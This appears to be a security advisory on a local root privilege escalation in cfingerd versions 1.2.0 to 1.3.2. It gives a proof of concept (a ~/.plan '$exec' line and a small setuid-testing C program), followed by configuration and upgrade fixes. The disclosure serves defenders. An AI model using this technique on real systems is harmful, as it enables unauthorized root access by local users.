COMMAND

    cfingerd

SYSTEMS AFFECTED

    cfingerd before 1.4.0

PROBLEM

    Martin Schulze found following.  A serious bug in cfingerd  before
    version 1.4.0 has  been reported.   It is present  in all versions
    of cfingerd from 1.2.0 up to any version of 1.3.2.  If  configured
    accordingly this bug enables  any local user to  execute arbitrary
    programs  with  root  priviledges.   The  exploit  is quite simple
    (thanks go to Tadek Knapik). You need to add

        $exec /tmp/relinq

    to your ~/.plan file.  Then compile the following relinq.c file in
    /tmp:

        #include <stdio.h>

        void main()
        {
        printf("Root exploit test\n");
        setregid(0, 0);
        setreuid(0, 0);
        printf("User: %d, group: %d.\n", getuid(), getgid());
        }

SOLUTION

    You  are  safe  if  you  have  disabled  ALLOW_EXECUTION  in  your
    cfingerd.conf file  in section  "internal_config", i.e.  that file
    contains  a  line   "-ALLOW_EXECUTION".   This   is  the   default
    configuration  of   this  package.    If  you   use  the   default
    cfingerd.conf file as shipped with the distribution you are  safe.
    You should still upgrade.

    - 1st Immediately turn  off ALLOW_EXECUTION in your  cfingerd.conf
      file.
    - 2nd Upgrade to the most  recent version of cfingerd 1.4.0 to  be
      found at the primary site

         ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/
         ftp://metalab.unc.edu/pub/Linux/system/network/finger/